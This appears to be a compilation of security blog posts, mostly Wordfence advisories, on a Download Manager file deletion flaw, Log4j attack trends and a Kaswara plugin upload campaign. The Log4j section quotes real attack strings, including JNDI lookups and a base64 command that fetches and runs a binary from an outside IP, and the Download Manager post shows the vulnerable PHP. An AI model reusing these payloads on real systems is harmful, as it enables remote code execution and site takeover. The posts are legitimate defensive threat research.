High Severity Vulnerability Patched in Download Manager Plugin

On July 8, 2022 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “Download Manager,” a WordPress plugin that is installed on over 100,000 sites. This flaw makes it possible for an authenticated attacker to delete arbitrary files hosted on the server, provided they have access to create downloads. If an attacker deletes the wp-config.php file they can gain administrative privileges, including the ability to execute code, by re-running the WordPress install process.

Wordfence Premium, Wordfence Care, and Wordfence Response received a firewall rule on July 8, 2022 to provide protection against any attackers that try to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on August 7, 2022.

We attempted to reach out to the developer on July 8, 2022, the same day we discovered the vulnerability. We never received a response so we sent the full details to the WordPress.org plugins team on July 26, 2022. The plugin was fully patched the next day on July 27, 2022.

We strongly recommend ensuring that your site has been updated to the latest patched version of “Download Manager”, which is version 3.2.53 at the time of this publication.

Description: Authenticated (Contributor+) Arbitrary File Deletion
Affected Plugin: Download Manager
Plugin Slug: download-manager
Plugin Developer: W3 Eden, Inc.
Affected Versions: <= 3.2.50
CVE ID: CVE-2022-2431
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Chloe Chamberland
Fully Patched Version: 3.2.51

Download Manager is a popular WordPress plugin designed to allow site content creators to share downloadable files that are stored as posts. These downloads can be displayed on the front-end of the WordPress site for users to download. Unfortunately, vulnerable versions of the plugin contain a bypass in how the downloadable file is stored and subsequently deleted upon post deletion that make it possible for attackers to delete arbitrary files on the server.

More specifically, vulnerable versions of the plugin register the deleteFiles() function that is called via the before_delete_post hook. This hook is triggered right before a post has been deleted and its intended functionality in this case is to delete any files that may have been uploaded and associated with a “download” post.

At first glance this looks like a relatively safe functionality assuming the originally supplied file path is validated. Unfortunately, however, that is not the case as the path to the file saved with the “download” post is not validated to ensure it was a safe file type or in a location associated with a “download” post. This means that a path to an arbitrary file with any extension can be supplied via the file[files][] parameter when saving a post and that would be the file associated with the “download” post. On many configurations an attacker could supply a path such as /var/www/html/wp-config.php that would associate the site’s WordPress configuration file with the download post.

	    add_action('before_delete_post', array($this, 'deleteFiles'), 10, 2);
	function deleteFiles($post_id, $post)
	{
		$files = WPDM()->package->getFiles($post_id, false);
		foreach ($files as $file) {
			$file = WPDM()->fileSystem->locateFile($file);
			@unlink($file);
		}
	}

When the user goes to permanently delete the “download” post the deleteFiles() function will be triggered by the before_delete_post hook and the supplied file will be deleted, if it exists.

This can be used by attackers to delete critical files hosted on the server. The wp-config.php file in particular is a popular target for attackers as deletion of this file would disconnect the existing database from the compromised site and allow the attacker to re-complete the initial installation process and connect their own database to the site. Once a database is connected, they would have access to the server and could upload arbitrary files to further infect the system.

Demonstrating site reset upon download post deletion.

This vulnerability requires contributor-level access and above to exploit, so it serves as an important reminder to make sure you don’t provide contributor-level and above access to untrusted users. It’s also important to validate that all users have strong passwords to ensure your site won’t subsequently be compromised as a result of a vulnerability like this due to an unauthorized actor gaining access via a weak or compromised password.

Timeline

  • July 8, 2022 – Discovery of the Arbitrary File Deletion Vulnerability in the “Download Manager” plugin. A firewall rule is released to Wordfence Premium, Wordfence Care, and Wordfence Response users. We attempt to initiate contact with the developer.
  • July 26, 2022 – After no response from the developer, we send the full disclosure details to the WordPress plugins team. They acknowledge the report and make contact with the developer.
  • July 27, 2022. – A fully patched version of the plugin is released as version 3.2.51.
  • August 7, 2022 – Wordfence free users receive the firewall rule.

Conclusion

In today’s post, we detailed a flaw in the “Download Manager” plugin that makes it possible for authenticated attackers to delete arbitrary files hosted on an affected server, which could lead to remote code execution and ultimately complete site compromise. This flaw has been fully patched in version 3.2.51.

We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 3.2.53 at the time of this publication.

Wordfence Premium, Wordfence Care, and Wordfence Response received a firewall rule on July 8, 2022 to provide protection against any attackers trying to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on August 7, 2022.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

The post High Severity Vulnerability Patched in Download Manager Plugin appeared first on Wordfence.

7 Tips to Clean & Maintain Your Website

Most people would agree — living in a house full of accumulated debris and unnecessary objects can create a chaotic environment, and even cause health problems. This scenario is easily applicable to your website, too. You can think of your hosting environment as the home where your website lives.  

It’s extremely easy for hosting accounts to get cluttered with plugins, themes, test scripts, and unused files. Unfortunately, this can not only slow down your website’s performance but also leave it open to infection.  

Continue reading 7 Tips to Clean & Maintain Your Website at Sucuri Blog.

Analyzing Attack Data and Trends Targeting Log4J

Analyzing Attack Data and Trends Targeting Log4J

The Log4j vulnerability, initially reported in November 2021, has affected millions of devices and applications around the world. It has the potential to allow a malicious actor to take full control of vulnerable devices. As a result of how Log4j controls the logging of strings and code, the vulnerability allows malicious actors to inject malicious code into logs, and trick applications into running that malicious code. When exploited, Log4j inflicts profound damage to affected systems and networks, and provides an attacker with full take-over of an affected system. This, combined with the ease with which the vulnerability can be exploited, resulted in the associated Log4j CVE-2021-44228 receiving the unusually high CVSS score of 10, which is the maximum threat score that can be given.

Log4j is a top logging utility that is a part of the Apache Logging services. The utility is Java-based, and was initially released in 2001. Log4j builds a log of application or system activities, helping developers to identify any issues that may negatively impact the end-user experience. While Log4j may not have been a well-known name prior to December of 2021, it quickly became a highly discussed topic after the zero-day vulnerability, tracked as CVE-2021-44228, was reported to Apache in November, and patched on December 6, 2021. Five days prior to the release of the patch, malicious actors began exploiting the vulnerability.

Wordfence is installed on over 4 million websites worldwide, which gives us unparalleled visibility into attacker payloads as well as large-scale attack patterns. We use this data to power the Wordfence IP blocklist that is available to our Wordfence Premium, Wordfence Care and Wordfence Response customers. It also provides us with valuable forensic data that our incident response team can use when performing forensic analysis for our Wordfence Care and Wordfence Response customers.

At Wordfence we monitor and block attacks targeting Log4j because the threat intelligence this provides helps us identify threat actors that are targeting not only our customers but their hosting providers and enterprise systems around the world. The threat intelligence we get from monitoring these attacks is a valuable source of data for our enterprise customers when determining who they should be blocking at their network edge, which C2 communication they should be monitoring, and which servers globally are being used as an attack platform and need to be remediated.

Anatomy of a Log4j Vulnerability Attack

All it really takes to pull off this attack is entering a string like {jndi:ldap://malicious-site.com:1792/payload} into a form field, such as the username field on a login page, or injecting it into a request sent to a vulnerable server. With the proper payload, this can open a reverse shell that gives the malicious actor the ability to complete commands and run code on the impacted server.

When the server receives the request, the malicious string is written to the log, and the vulnerability allows this to be run as code. In one example of a simple exploit attempt we detected, the payload is referencing the location cakgeqplp7krte800010wgfiJxzyhzpss.oast[.]fun/info. This type of payload is often used for the purpose of opening a reverse shell, although any number of malicious activities can be enacted with this method.

simple Log4j attack request

In this case, the user agent identifies the request as coming from a Google Chrome Browser on Windows XP. Spoofing User-Agents is a tactic often used by both malicious actors and security researchers alike, so this can be a clue but should be taken with a grain of salt.

User-Agent string

We often see more complex versions of this exploit as well. Payloads are often hidden using base64 encoding in the request at several points. This is a common method used by malicious actors to bypass security measures and make their code unreadable to analysts or security protection mechanisms. The jndi:ldap: portion of the payload can also be hidden in dummy functions. Multiple obfuscation techniques are used to avoid detection in these attacks to make it harder for analysts to read the code or avoid automatic detection. Here we see that the ${jndi:ldap: portion of the string is split to possibly prevent automatic detection due to breaking the string up within the code.

Log4j request obfuscation

The referrer, user-agent, and x-api-version sections of this request include the full payload, including ${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:} which becomes jndi:ldap: in the request.

complex Log4j request with obfuscated payloads

Malicious actors do not know which fields will be logged on a system, so they frequently submit the exploit in multiple places to see what works. In the request above, we see the Referrer, User-Agent, and X-API-Version with the same malicious string. The final payload here is accessed from //146.190.40.2:1389/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjEwMS4xMzkuMjE2OjE5NjQvYTAwMS54ODYgLW8gYTAwMS54ODY7IHdnZXQgaHR0cDovLzE4NS4xMDEuMTM5LjIxNjoxOTY0L2EwMDEueDg2OyBjaG1vZCA3NzcgYTAwMS54ODY7IC4vYTAwMS54ODY7IHJtIC1yZiBhMDAxLng4Njsgcm0gLXJmIGEwMDEueDg2LjE= which decodes the intended command and runs it on the affected server.

This uses both curl and wget to download the payload, sets the maximum allowed permissions on the file, runs the downloaded file, then removes both copies of the downloaded file once it has been run. The use of multiple download methods increases the possibility of a successful download.

Final payloads do appear to be taken down quickly. We tried to obtain a final payload from several locations, and were unable to successfully connect to the payload location. This goes to show both the dedication of the cybersecurity community in combating potential attacks, as well as how fast malicious actors move on and set up new resources as needed.

Log4j Exploit Attempt Volume Over Time

Wordfence has observed some interesting trends since we began tracking and blocking Log4j vulnerability exploit attempts several months ago. The number of exploit attempts have been relatively consistent from the start of our tracking, attempts are coming from unexpected places, and some regions appear to be bigger targets. With that said, our data indicates that malicious actors are not moving on from this vulnerability.

total volume of incoming Log4j attack attempts

Where Are the Attempted Attacks Coming From?

Reviewing the data from the top 100 locations we are seeing exploit attempts originating from in the past 30 days shows that only a few IP addresses are responsible for very large numbers of exploit attempts. There were 11,060,156 blocked attempts in this time frame, and a total of 38,258 IP addresses logged as originators of exploit attempts.

number of exploits blocked per IP address

The server locations for the top 15 IP addresses detected include countries like the United States, Switzerland, United Kingdom, France, and Belgium. In addition to these, many of the other countries may have legitimate reasons for accessing your services as well, making regional blocks more difficult for many organizations.

server providers for top 15 attacking IP addresses

The attack attempts largely originate from IP addresses owned by legitimate providers. This is something common we see during attack campaigns as attackers typically try to find the cheapest or most reliable way to deliver their attacks. It is unlikely you would want to block access from all IP addresses assigned to Amazon or Microsoft and it is not recommended to do so. Fortunately, with that said, most of these providers will quickly remove access for users who are found to be performing malicious activities.

server locations of top 15 attacker IP addresses

Malicious actors will often use one IP or service for a short time, then quickly move to a new IP address, server, or service provider. This could either be to avoid detection, or to recover once they have been detected. For this reason, we have a blocklist that is regularly updated with known malicious IP addresses. When an IP address is no longer being used for malicious purposes, we remove the address from the list so that legitimate websites and services are not blocked. This allows malicious actors to be blocked, while legitimate site users and services can be allowed the needed access to your website.

Many organizations are taking this vulnerability seriously, and having their servers checked for the vulnerability. We saw a total of 1,296,940 benign vulnerability scanning attempts from security vendors. These scanning attempts have been excluded from the data above.

Conclusion

In this post, we covered the critical Log4j vulnerability tracked as CVE-2021-44228 and the visibility Wordfence has as an endpoint security provider. Wordfence uses this data to ensure that our users are protected from emerging and lingering threats ranging from vulnerabilities to malware. This same data can also be used to provide additional protection against attacks against your networks and other systems.

Threat intelligence is an important part of keeping your systems, applications, and networks safe. A view of the trends and details of attack campaigns can show you what threats are likely to affect your organization, giving you the opportunity to mitigate attacks.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

The post Analyzing Attack Data and Trends Targeting Log4J appeared first on Wordfence.

WordPress Vulnerabilities & Patch Roundup — July 2022

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises.

To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month.

Youzify – Unauthenticated SQLi
Security Risk: Critical
Vulnerability: SQL Injection
Exploitation Level: Can be exploited remotely without authentication.

Continue reading WordPress Vulnerabilities & Patch Roundup — July 2022 at Sucuri Blog.

PSA: Sudden Increase In Attacks On Modern WPBakery Page Builder Addons Vulnerability

PSA: Sudden Increase In Attacks On Modern WPBakery Page Builder Addons Vulnerability

The Wordfence Threat Intelligence team has been monitoring a sudden increase in attack attempts targeting Kaswara Modern WPBakery Page Builder Addons. This ongoing campaign is attempting to take advantage of an arbitrary file upload vulnerability, tracked as CVE-2021-24284, which has been previously disclosed and has not been patched on the now closed plugin. As the plugin was closed without a patch, all versions of the plugin are impacted by this vulnerability. The vulnerability can be used to upload malicious PHP files to an affected website, leading to code execution and complete site takeover. Once they’ve established a foothold, attackers can also inject malicious JavaScript into files on the site, among other malicious actions.

All Wordfence customers have been protected from this attack campaign by the Wordfence Firewall since May 21, 2021, with Wordfence Premium, Care, and Response customers having received the firewall rule 30 days earlier on April 21, 2021. Even though Wordfence provides protection against this vulnerability, we strongly recommend completely removing Kaswara Modern WPBakery Page Builder Addons as soon as possible and finding an alternative as it is unlikely the plugin will ever receive a patch for this critical vulnerability. We are currently protecting over 1,000 websites that still have the plugin installed, and we estimate that between 4,000 and 8,000 websites in total still have the plugin installed.

We have blocked an average of 443,868 attack attempts per day against the network of sites that we protect during the course of this campaign. Please be aware that while 1,599,852 unique sites were targeted, a majority of those sites were not running the vulnerable plugin.

total volume of attacks


Description: Arbitrary File Upload/Deletion and Other
Affected Plugin: Kaswara Modern WPBakery Page Builder Addons
Plugin Slug: kaswara
Affected Versions: <= 3.0.1
CVE ID: CVE-2021-24284
CVSS Score: 10.0 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Fully Patched Version: NO AVAILABLE PATCH.

Indicators of Attack

The majority of the attacks we have seen are sending a POST request to /wp-admin/admin-ajax.php using the uploadFontIcon AJAX action found in the plugin to upload a file to the impacted website. Your logs may show the following query string on these events:

/wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1

We have observed 10,215 attacking IP addresses, with the vast majority of exploit attempts coming from these top ten IPs:

  • 217.160.48.108 with 1,591,765 exploit attempts blocked
  • 5.9.9.29 with 898,248 exploit attempts blocked
  • 2.58.149.35 with 390,815 exploit attempts blocked
  • 20.94.76.10 with 276,006 exploit attempts blocked
  • 20.206.76.37 with 212,766 exploit attempts blocked
  • 20.219.35.125 with 187,470 exploit attempts blocked
  • 20.223.152.221 with 102,658 exploit attempts blocked
  • 5.39.15.163 with 62,376 exploit attempts blocked
  • 194.87.84.195 with 32,890 exploit attempts blocked
  • 194.87.84.193 with 31,329 exploit attempts blocked

total exploit attempts

Indicators of Compromise

Based on our analysis of the attack data, a majority of attackers are attempting to upload a zip file named a57bze8931.zip. When attackers are successful at uploading the zip file, a single file named a57bze8931.php will be extracted into the /wp-content/uploads/kaswara/icons/ directory. The malicious file has an MD5 hash of d03c3095e33c7fe75acb8cddca230650. This file is an uploader under the control of the attacker. With this file, a malicious actor has the ability to continue uploading files to the compromised website.

The indicators observed in these attacks also include signs of the NDSW trojan, which injects code into otherwise legitimate JavaScript files and redirects site visitors to malicious websites. The presence of  this string in your JavaScript files is a strong indication that your site has been infected with NDSW:

;if(ndsw==

Some additional filenames that attackers are attempting to upload includes:

  • [xxx]_young.zip where [xxx] varies and typically consists of 3 characters like ‘svv_young’
  • inject.zip
  • king_zip.zip
  • null.zip
  • plugin.zip

What Should I Do If I Use This Plugin?

All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability. However, at this time the plugin has been closed, and the developer has not been responsive regarding a patch. The best option is to fully remove the Kaswara Modern WPBakery Page Builder Addons plugin from your WordPress website.

If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that can lead to complete site takeover.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

The post PSA: Sudden Increase In Attacks On Modern WPBakery Page Builder Addons Vulnerability appeared first on Wordfence.

DHL Phishing Page Uses Telegram Bot for Exfiltration

One of the quickest ways for an attacker to harvest financial data, credentials, and sensitive personal information is through phishing. These social engineering attacks can typically be found masquerading as a trusted or recognizable service, intent on tricking unsuspecting users into submitting sensitive information on the attacker’s customized web page.

Criminals use phishing because it can be easier to exploit a human’s natural inclination to trust rather than look for new ways to exploit a software vulnerability — it’s often easier to trick a user into giving up their password than trying to hack the password using brute force or dictionary attacks, unless of course the target happens to be using really weak credentials.

Continue reading DHL Phishing Page Uses Telegram Bot for Exfiltration at Sucuri Blog.

Pin It on Pinterest